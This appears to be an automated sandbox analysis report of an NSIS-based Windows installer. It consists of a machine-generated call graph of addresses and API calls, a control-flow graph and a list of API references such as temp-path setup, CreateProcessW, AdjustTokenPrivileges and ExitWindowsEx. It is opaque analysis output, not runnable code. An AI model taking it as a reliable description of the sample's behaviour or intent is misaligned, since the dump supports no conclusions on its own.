4043c6 8 API calls 5738->5744 5739->5738 5750 405803 SendMessageW 5739->5750 5748 405695 5740->5748 5749 405679 SendMessageW SendMessageW 5740->5749 5751 404338 SendMessageW 5742->5751 5746 4057e1 5743->5746 5747 4057ef 5743->5747 5745 4057c8 5744->5745 5752 405450 24 API calls 5746->5752 5753 404338 SendMessageW 5747->5753 5754 4056a8 5748->5754 5755 40569a SendMessageW 5748->5755 5749->5748 5750->5745 5756 40581c CreatePopupMenu 5750->5756 5751->5738 5752->5747 5753->5739 5758 40435f 18 API calls 5754->5758 5755->5754 5757 40640a 17 API calls 5756->5757 5759 40582c AppendMenuW 5757->5759 5760 4056b8 5758->5760 5761 405849 GetWindowRect 5759->5761 5762 40585c TrackPopupMenu 5759->5762 5763 4056c1 ShowWindow 5760->5763 5764 4056f5 GetDlgItem SendMessageW 5760->5764 5761->5762 5762->5745 5766 405877 5762->5766 5767 4056e4 5763->5767 5768 4056d7 ShowWindow 5763->5768 5764->5745 5765 40571c SendMessageW SendMessageW 5764->5765 5765->5745 5769 405893 SendMessageW 5766->5769 5775 404394 SendMessageW 5767->5775 5768->5767 5769->5769 5770 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5769->5770 5772 4058d5 SendMessageW 5770->5772 5772->5772 5773 4058fe GlobalUnlock SetClipboardData CloseClipboard 5772->5773 5773->5745 5774->5734 5775->5764 5776->5735 5777 401491 5778 405450 24 API calls 5777->5778 5779 401498 5778->5779 5787 401d14 5788 402c1f 17 API calls 5787->5788 5789 401d1b 5788->5789 5790 402c1f 17 API calls 5789->5790 5791 401d27 GetDlgItem 5790->5791 5792 402592 5791->5792 5793 404495 lstrcpynW lstrlenW 5794 403a96 5795 403aa1 5794->5795 5796 403aa5 5795->5796 5797 403aa8 GlobalAlloc 5795->5797 5797->5796 5798 402598 5799 4025c7 5798->5799 5800 4025ac 5798->5800 5802 4025fb 5799->5802 5803 4025cc 5799->5803 5801 402c1f 17 API calls 5800->5801 5810 4025b3 5801->5810 5805 402c41 17 API calls 5802->5805 5804 402c41 17 API calls 5803->5804 5806 4025d3 WideCharToMultiByte lstrlenA 5804->5806 5807 402602 lstrlenW 5805->5807 5806->5810 5807->5810 5808 40262f 5809 402645 5808->5809 5811 405f90 WriteFile 5808->5811 5810->5808 5810->5809 5812 405fbf 5 API calls 5810->5812 5811->5809 5812->5808 5813 40451e 5814 404536 5813->5814 5817 404650 5813->5817 5818 40435f 18 API calls 5814->5818 5815 4046ba 5816 4046c4 GetDlgItem 5815->5816 5819 404784 5815->5819 5820 404745 5816->5820 5821 4046de 5816->5821 5817->5815 5817->5819 5822 40468b GetDlgItem SendMessageW 5817->5822 5823 40459d 5818->5823 5824 4043c6 8 API calls 5819->5824 5820->5819 5825 404757 5820->5825 5821->5820 5829 404704 SendMessageW LoadCursorW SetCursor 5821->5829 5846 404381 EnableWindow 5822->5846 5827 40435f 18 API calls 5823->5827 5828 40477f 5824->5828 5830 40476d 5825->5830 5831 40475d SendMessageW 5825->5831 5833 4045aa CheckDlgButton 5827->5833 5847 4047cd 5829->5847 5830->5828 5836 404773 SendMessageW 5830->5836 5831->5830 5832 4046b5 5837 4047a9 SendMessageW 5832->5837 5844 404381 EnableWindow 5833->5844 5836->5828 5837->5815 5839 4045c8 GetDlgItem 5845 404394 SendMessageW 5839->5845 5841 4045de SendMessageW 5842 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5841->5842 5843 4045fb GetSysColor 5841->5843 5842->5828 5843->5842 5844->5839 5845->5841 5846->5832 5850 405a14 ShellExecuteExW 5847->5850 5849 404733 LoadCursorW SetCursor 5849->5820 5850->5849 5851 40149e 5852 4014ac PostQuitMessage 5851->5852 5853 4022f7 5851->5853 5852->5853 5854 401c1f 5855 402c1f 17 API calls 5854->5855 5856 401c26 5855->5856 5857 402c1f 17 API calls 5856->5857 5858 401c33 5857->5858 5859 401c48 5858->5859 5860 402c41 17 API calls 5858->5860 5863 402c41 17 API calls 5859->5863 5866 401c58 5859->5866 5860->5859 5861 401c63 5864 402c1f 17 API calls 5861->5864 5862 401caf 5865 402c41 17 API calls 5862->5865 5863->5866 5867 401c68 5864->5867 5868 401cb4 5865->5868 5866->5861 5866->5862 5869 402c1f 17 API calls 5867->5869 5870 402c41 17 API calls 5868->5870 5871 401c74 5869->5871 5872 401cbd FindWindowExW 5870->5872 5873 401c81 SendMessageTimeoutW 5871->5873 5874 401c9f SendMessageW 5871->5874 5875 401cdf 5872->5875 5873->5875 5874->5875 5876 402aa0 SendMessageW 5877 402ac5 5876->5877 5878 402aba InvalidateRect 5876->5878 5878->5877 5879 402821 5880 402827 5879->5880 5881 402ac5 5880->5881 5882 40282f FindClose 5880->5882 5882->5881 5883 4015a3 5884 402c41 17 API calls 5883->5884 5885 4015aa SetFileAttributesW 5884->5885 5886 4015bc 5885->5886 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4571 4035c6 4563->4571 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4572 403474 12 API calls 4567->4572 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4569 405cea CharNextW 4569->4571 4571->4569 4576 4036c0 4571->4576 4578 4036c2 4571->4578 4574 40370f 4572->4574 4573 40375d 4581 405cea CharNextW 4573->4581 4616 403800 4573->4616 4629 403810 4573->4629 4574->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4574->4575 4579 403474 12 API calls 4575->4579 4576->4564 4732 4063e8 lstrcpynW 4578->4732 4580 403741 4579->4580 4580->4568 4580->4629 4589 40377c 4581->4589 4585 40394a 4587 403952 GetCurrentProcess OpenProcessToken 4585->4587 4588 4039ce ExitProcess 4585->4588 4586 40382a 4744 405a4e 4586->4744 4591 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4587->4591 4592 40399e 4587->4592 4594 403840 4589->4594 4595 4037da 4589->4595 4591->4592 4598 4067c2 5 API calls 4592->4598 4597 4059b9 5 API calls 4594->4597 4599 405dc5 18 API calls 4595->4599 4600 403845 lstrcatW 4597->4600 4601 4039a5 4598->4601 4602 4037e6 4599->4602 4603 403861 lstrcatW lstrcmpiW 4600->4603 4604 403856 lstrcatW 4600->4604 4605 4039ba ExitWindowsEx 4601->4605 4608 4039c7 4601->4608 4602->4629 4733 4063e8 lstrcpynW 4602->4733 4607 40387d 4603->4607 4603->4629 4604->4603 4605->4588 4605->4608 4610 403882 4607->4610 4611 403889 4607->4611 4612 40140b 2 API calls 4608->4612 4609 4037f5 4734 4063e8 lstrcpynW 4609->4734 4614 40591f 4 API calls 4610->4614 4615 40599c 2 API calls 4611->4615 4612->4588 4617 403887 4614->4617 4618 40388e SetCurrentDirectoryW 4615->4618 4676 403ad8 4616->4676 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4628 4061ae 36 API calls 4626->4628 4627 4061ae 36 API calls 4627->4631 4628->4629 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4627 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4638 403480 4637->4638 4639 40348a 4638->4639 4640 405cbd 3 API calls 4638->4640 4639->4566 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4675 402f80 4648->4675 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4673 402fbe 4654->4673 4656 402e8e 32 API calls 4655->4656 4657 4030af 4656->4657 4659 4030eb GlobalAlloc 4657->4659 4657->4675 4761 40345d SetFilePointer 4657->4761 4658 403447 ReadFile 4658->4673 4663 403102 4659->4663 4660 403143 4661 402e8e 32 API calls 4660->4661 4661->4675 4667 405f0d 2 API calls 4663->4667 4664 4030cc 4665 403447 ReadFile 4664->4665 4668 4030d7 4665->4668 4666 402e8e 32 API calls 4666->4673 4669 403113 CreateFileW 4667->4669 4668->4659 4668->4675 4670 40314d 4669->4670 4669->4675 4760 40345d SetFilePointer 4670->4760 4672 40315b 4674 4031d6 44 API calls 4672->4674 4673->4655 4673->4658 4673->4660 4673->4666 4673->4675 4674->4675 4675->4573 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4683 403b53 lstrcatW 4682->4683 4685 4062b6 3 API calls 4682->4685 4686 403b02 4683->4686 4685->4683 4762 403dae 4686->4762 4689 405dc5 18 API calls 4690 403b85 4689->4690 4691 403c19 4690->4691 4693 4062b6 3 API calls 4690->4693 4692 405dc5 18 API calls 4691->4692 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4699 40640a 17 API calls 4694->4699 4695->4691 4702 403bd8 lstrlenW 4695->4702 4706 405cea CharNextW 4695->4706 4697 403cd5 4696->4697 4698 403c56 RegisterClassW 4696->4698 4701 40140b 2 API calls 4697->4701 4700 403c8c SystemParametersInfoW CreateWindowExW 4698->4700 4731 403cdf 4698->4731 4699->4696 4700->4697 4705 403cdb 4701->4705 4703 403be6 lstrcmpiW 4702->4703 4704 403c0c 4702->4704 4703->4704 4707 403bf6 GetFileAttributesW 4703->4707 4708 405cbd 3 API calls 4704->4708 4711 403dae 18 API calls 4705->4711 4705->4731 4709 403bd5 4706->4709 4710 403c02 4707->4710 4712 403c12 4708->4712 4709->4702 4710->4704 4713 405d09 2 API calls 4710->4713 4714 403cec 4711->4714 4771 4063e8 lstrcpynW 4712->4771 4713->4704 4716 403cf8 ShowWindow 4714->4716 4717 403d7b 4714->4717 4719 406752 3 API calls 4716->4719 4772 405523 OleInitialize 4717->4772 4721 403d10 4719->4721 4720 403d81 4722 403d85 4720->4722 4723 403d9d 4720->4723 4724 403d1e GetClassInfoW 4721->4724 4726 406752 3 API calls 4721->4726 4730 40140b 2 API calls 4722->4730 4722->4731 4725 40140b 2 API calls 4723->4725 4727 403d32 GetClassInfoW RegisterClassW 4724->4727 4728 403d48 DialogBoxParamW 4724->4728 4725->4731 4726->4724 4727->4728 4729 40140b 2 API calls 4728->4729 4729->4731 4730->4731 4731->4629 4732->4576 4733->4609 4734->4616 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4585 4743->4586 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4672 4761->4664 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4686 4771->4691 4773 4043ab SendMessageW 4772->4773 4774 405546 4773->4774 4777 40556d 4774->4777 4778 401389 2 API calls 4774->4778 4775 4043ab SendMessageW 4776 40557f OleUninitialize 4775->4776 4776->4720 4777->4775 4778->4774 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5887 404ba6 5888 404bd2 5887->5888 5889 404bb6 5887->5889 5891 404c05 5888->5891 5892 404bd8 SHGetPathFromIDListW 5888->5892 5898 405a32 GetDlgItemTextW 5889->5898 5894 404be8 5892->5894 5897 404bef SendMessageW 5892->5897 5893 404bc3 SendMessageW 5893->5888 5895 40140b 2 API calls 5894->5895 5895->5897 5897->5891 5898->5893 5913 6f9522fd 5914 6f952367 5913->5914 5915 6f952372 GlobalAlloc 5914->5915 5916 6f952391 5914->5916 5915->5914 5917 4029a8 5918 402c1f 17 API calls 5917->5918 5919 4029ae 5918->5919 5920 4029d5 5919->5920 5921 4029ee 5919->5921 5924 40288b 5919->5924 5925 4029da 5920->5925 5926 4029eb 5920->5926 5922 402a08 5921->5922 5923 4029f8 5921->5923 5928 40640a 17 API calls 5922->5928 5927 402c1f 17 API calls 5923->5927 5931 4063e8 lstrcpynW 5925->5931 5926->5924 5932 40632f wsprintfW 5926->5932 5927->5926 5928->5926 5931->5924 5932->5924 5933 4028ad 5934 402c41 17 API calls 5933->5934 5936 4028bb 5934->5936 5935 4028d1 5938 405eb9 2 API calls 5935->5938 5936->5935 5937 402c41 17 API calls 5936->5937 5937->5935 5939 4028d7 5938->5939 5961 405ede GetFileAttributesW CreateFileW 5939->5961 5941 4028e4 5942 4028f0 GlobalAlloc 5941->5942 5943 402987 5941->5943 5944 402909 5942->5944 5945 40297e CloseHandle 5942->5945 5946 4029a2 5943->5946 5947 40298f DeleteFileW 5943->5947 5962 40345d SetFilePointer 5944->5962 5945->5943 5947->5946 5949 40290f 5950 403447 ReadFile 5949->5950 5951 402918 GlobalAlloc 5950->5951 5952 402928 5951->5952 5953 40295c 5951->5953 5954 4031d6 44 API calls 5952->5954 5955 405f90 WriteFile 5953->5955 5960 402935 5954->5960 5956 402968 GlobalFree 5955->5956 5957 4031d6 44 API calls 5956->5957 5958 40297b 5957->5958 5958->5945 5959 402953 GlobalFree 5959->5953 5960->5959 5961->5941 5962->5949 5970 401a30 5971 402c41 17 API calls 5970->5971 5972 401a39 ExpandEnvironmentStringsW 5971->5972 5973 401a4d 5972->5973 5975 401a60 5972->5975 5974 401a52 lstrcmpW 5973->5974 5973->5975 5974->5975 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5070 401423 24 API calls 5068->5070 5071 40204b 5069->5071 5077 402250 5070->5077 5072 402c41 17 API calls 5071->5072 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5076 40207b 5074->5076 5075->5074 5075->5076 5089 406831 WideCharToMultiByte 5076->5089 5080 4020c5 5084 405450 24 API calls 5080->5084 5081 40208c 5082 402094 5081->5082 5083 4020ab 5081->5083 5086 401423 24 API calls 5082->5086 5092 6f951777 5083->5092 5085 40209c 5084->5085 5085->5077 5087 4020e8 FreeLibrary 5085->5087 5086->5085 5087->5077 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 6f9517aa 5092->5093 5134 6f951b5f 5093->5134 5095 6f9517b1 5096 6f9518d6 5095->5096 5097 6f9517c2 5095->5097 5098 6f9517c9 5095->5098 5096->5085 5184 6f952352 5097->5184 5168 6f952394 5098->5168 5103 6f95182d 5108 6f951833 5103->5108 5109 6f95187e 5103->5109 5104 6f95180f 5197 6f952569 5104->5197 5105 6f9517df 5112 6f9517e5 5105->5112 5113 6f9517f0 5105->5113 5106 6f9517f8 5117 6f9517ee 5106->5117 5194 6f952d37 5106->5194 5216 6f9515c6 5108->5216 5110 6f952569 10 API calls 5109->5110 5118 6f95186f 5110->5118 5111 6f951815 5208 6f9515b4 5111->5208 5112->5117 5178 6f952aac 5112->5178 5188 6f952724 5113->5188 5117->5103 5117->5104 5125 6f9518c5 5118->5125 5222 6f95252c 5118->5222 5123 6f9517f6 5123->5117 5124 6f952569 10 API calls 5124->5118 5125->5096 5129 6f9518cf GlobalFree 5125->5129 5129->5096 5131 6f9518b1 5131->5125 5226 6f95153d wsprintfW 5131->5226 5132 6f9518aa FreeLibrary 5132->5131 5229 6f95121b GlobalAlloc 5134->5229 5136 6f951b83 5230 6f95121b GlobalAlloc 5136->5230 5138 6f951da9 GlobalFree GlobalFree GlobalFree 5139 6f951dc6 5138->5139 5154 6f951e10 5138->5154 5140 6f952192 5139->5140 5149 6f951ddb 5139->5149 5139->5154 5142 6f9521b4 GetModuleHandleW 5140->5142 5140->5154 5141 6f951c64 GlobalAlloc 5160 6f951b8e 5141->5160 5144 6f9521c5 LoadLibraryW 5142->5144 5145 6f9521da 5142->5145 5143 6f951ccd GlobalFree 5143->5160 5144->5145 5144->5154 5237 6f95161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5145->5237 5146 6f951caf lstrcpyW 5148 6f951cb9 lstrcpyW 5146->5148 5148->5160 5149->5154 5233 6f95122c 5149->5233 5150 6f95222c 5152 6f952239 lstrlenW 5150->5152 5150->5154 5238 6f95161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5152->5238 5153 6f952064 5236 6f95121b GlobalAlloc 5153->5236 5154->5095 5155 6f9521ec 5155->5150 5166 6f952216 GetProcAddress 5155->5166 5156 6f9520ec 5156->5154 5163 6f952134 lstrcpyW 5156->5163 5159 6f952253 5159->5154 5160->5138 5160->5141 5160->5143 5160->5146 5160->5148 5160->5153 5160->5154 5160->5156 5161 6f951d0b 5160->5161 5162 6f951fa5 GlobalFree 5160->5162 5164 6f95122c 2 API calls 5160->5164 5161->5160 5231 6f95158f GlobalSize GlobalAlloc 5161->5231 5162->5160 5163->5154 5164->5160 5166->5150 5167 6f95206d 5167->5095 5175 6f9523ac 5168->5175 5169 6f95122c GlobalAlloc lstrcpynW 5169->5175 5171 6f9524d5 GlobalFree 5172 6f9517cf 5171->5172 5171->5175 5172->5105 5172->5106 5172->5117 5173 6f952454 GlobalAlloc WideCharToMultiByte 5173->5171 5174 6f95247f GlobalAlloc CLSIDFromString 5174->5171 5175->5169 5175->5171 5175->5173 5175->5174 5177 6f95249e 5175->5177 5240 6f9512ba 5175->5240 5177->5171 5244 6f9526b8 5177->5244 5180 6f952abe 5178->5180 5179 6f952b63 CreateFileA 5183 6f952b81 5179->5183 5180->5179 5182 6f952c4d 5182->5117 5247 6f952a56 5183->5247 5185 6f952367 5184->5185 5186 6f952372 GlobalAlloc 5185->5186 5187 6f9517c8 5185->5187 5186->5185 5187->5098 5192 6f952754 5188->5192 5189 6f952802 5191 6f952808 GlobalSize 5189->5191 5193 6f952812 5189->5193 5190 6f9527ef GlobalAlloc 5190->5193 5191->5193 5192->5189 5192->5190 5193->5123 5195 6f952d42 5194->5195 5196 6f952d82 GlobalFree 5195->5196 5251 6f95121b GlobalAlloc 5197->5251 5199 6f9525ec MultiByteToWideChar 5205 6f952573 5199->5205 5200 6f95261f lstrcpynW 5200->5205 5201 6f95260e StringFromGUID2 5201->5205 5202 6f952632 wsprintfW 5202->5205 5203 6f952656 GlobalFree 5203->5205 5204 6f95268b GlobalFree 5204->5111 5205->5199 5205->5200 5205->5201 5205->5202 5205->5203 5205->5204 5206 6f951272 2 API calls 5205->5206 5252 6f9512e1 5205->5252 5206->5205 5256 6f95121b GlobalAlloc 5208->5256 5210 6f9515b9 5211 6f9515c6 2 API calls 5210->5211 5212 6f9515c3 5211->5212 5213 6f951272 5212->5213 5214 6f9512b5 GlobalFree 5213->5214 5215 6f95127b GlobalAlloc lstrcpynW 5213->5215 5214->5118 5215->5214 5217 6f9515ff lstrcpyW 5216->5217 5219 6f9515d2 wsprintfW 5216->5219 5221 6f951618 5217->5221 5219->5221 5221->5124 5223 6f951891 5222->5223 5224 6f95253a 5222->5224 5223->5131 5223->5132 5224->5223 5225 6f952556 GlobalFree 5224->5225 5225->5224 5227 6f951272 2 API calls 5226->5227 5228 6f95155e 5227->5228 5228->5125 5229->5136 5230->5160 5232 6f9515ad 5231->5232 5232->5161 5239 6f95121b GlobalAlloc 5233->5239 5235 6f95123b lstrcpynW 5235->5154 5236->5167 5237->5155 5238->5159 5239->5235 5241 6f9512c1 5240->5241 5242 6f95122c 2 API calls 5241->5242 5243 6f9512df 5242->5243 5243->5175 5245 6f9526c6 VirtualAlloc 5244->5245 5246 6f95271c 5244->5246 5245->5246 5246->5177 5248 6f952a61 5247->5248 5249 6f952a66 GetLastError 5248->5249 5250 6f952a71 5248->5250 5249->5250 5250->5182 5251->5205 5253 6f95130c 5252->5253 5254 6f9512ea 5252->5254 5253->5205 5254->5253 5255 6f9512f0 lstrcpyW 5254->5255 5255->5253 5256->5210 5981 6f9510e1 5983 6f951111 5981->5983 5982 6f9511d8 GlobalFree 5983->5982 5984 6f9512ba 2 API calls 5983->5984 5985 6f9511d3 5983->5985 5986 6f951272 2 API calls 5983->5986 5987 6f951164 GlobalAlloc 5983->5987 5988 6f9511f8 GlobalFree 5983->5988 5989 6f9511c4 GlobalFree 5983->5989 5990 6f9512e1 lstrcpyW 5983->5990 5984->5983 5985->5982 5986->5989 5987->5983 5988->5983 5989->5983 5990->5983 5991 402a35 5992 402c1f 17 API calls 5991->5992 5993 402a3b 5992->5993 5994 402a72 5993->5994 5995 40288b 5993->5995 5997 402a4d 5993->5997 5994->5995 5996 40640a 17 API calls 5994->5996 5996->5995 5997->5995 5999 40632f wsprintfW 5997->5999 5999->5995 6000 401735 6001 402c41 17 API calls 6000->6001 6002 40173c SearchPathW 6001->6002 6003 4029e6 6002->6003 6004 401757 6002->6004 6004->6003 6006 4063e8 lstrcpynW 6004->6006 6006->6003 6007 4014b8 6008 4014be 6007->6008 6009 401389 2 API calls 6008->6009 6010 4014c6 6009->6010 6011 6f95166d 6012 6f951516 GlobalFree 6011->6012 6015 6f951685 6012->6015 6013 6f9516cb GlobalFree 6014 6f9516a0 6014->6013 6015->6013 6015->6014 6016 6f9516b7 VirtualFree 6015->6016 6016->6013 6017 401db9 GetDC 6018 402c1f 17 API calls 6017->6018 6019 401dcb GetDeviceCaps MulDiv ReleaseDC 6018->6019 6020 402c1f 17 API calls 6019->6020 6021 401dfc 6020->6021 6022 40640a 17 API calls 6021->6022 6023 401e39 CreateFontIndirectW 6022->6023 6024 402592 6023->6024 6025 40283b 6026 402843 6025->6026 6027 402847 FindNextFileW 6026->6027 6028 402859 6026->6028 6027->6028 6030 4029e6 6028->6030 6031 4063e8 lstrcpynW 6028->6031 6031->6030

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 52 4036b2-4036b3 36->52 53 4036b4-4036ba 36->53 42 4035f2-4035fa 37->42 43 40360b-403644 37->43 38->39 58 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->58 54 403814-403824 call 4039e6 OleUninitialize 39->54 55 403769-40376f 39->55 47 403601 42->47 48 4035fc-4035ff 42->48 49 403661-40369b 43->49 50 403646-40364b 43->50 47->43 48->43 48->47 49->36 57 40369d-4036a1 49->57 50->49 56 40364d-403655 50->56 52->53 53->28 59 4036c0 53->59 75 40394a-403950 54->75 76 40382a-40383a call 405a4e ExitProcess 54->76 60 403804-40380b call 403ad8 55->60 61 403775-403780 call 405cea 55->61 63 403657-40365a 56->63 64 40365c 56->64 57->36 65 4036c2-4036d0 call 4063e8 57->65 58->39 58->54 68 4036d5 59->68 74 403810 60->74 79 403782-4037b7 61->79 80 4037ce-4037d8 61->80 63->49 63->64 64->49 65->68 68->29 74->54 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 82 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->82 83 40399e-4039ac call 4067c2 77->83 85 4039d8 78->85 86 4039dc-4039e0 ExitProcess 78->86 84 4037b9-4037bd 79->84 87 403840-403854 call 4059b9 lstrcatW 80->87 88 4037da-4037e8 call 405dc5 80->88 82->83 102 4039ba-4039c5 ExitWindowsEx 83->102 103 4039ae-4039b8 83->103 92 4037c6-4037ca 84->92 93 4037bf-4037c4 84->93 85->86 100 403861-40387b lstrcatW lstrcmpiW 87->100 101 403856-40385c lstrcatW 87->101 88->54 99 4037ea-403800 call 4063e8 * 2 88->99 92->84 98 4037cc 92->98 93->92 93->98 98->80 99->60 100->54 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->54 138->126
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
